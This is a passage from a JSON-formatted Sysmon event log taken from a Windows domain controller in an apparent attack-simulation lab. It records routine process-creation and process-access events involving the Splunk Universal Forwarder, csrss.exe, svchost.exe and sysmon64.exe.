08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8395,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.303\r\nProcessGuid: {41C8662E-22CF-5F25-0000-00107A941100}\r\nProcessId: 4044\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.303","ProcessGuid":"{41C8662E-22CF-5F25-0000-00107A941100}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8396,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.303\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-22A8-5F25-0000-00105C371000}\r\nTargetProcessId: 4044\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.303","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-22A8-5F25-0000-00105C371000}","TargetProcessId":"4044","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8397,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.303\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22A8-5F25-0000-00105C371000}\r\nTargetProcessId: 4044\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.303","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22A8-5F25-0000-00105C371000}","TargetProcessId":"4044","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8398,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8399,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8400,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8401,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8402,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:43.303","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8403,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:43.303\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 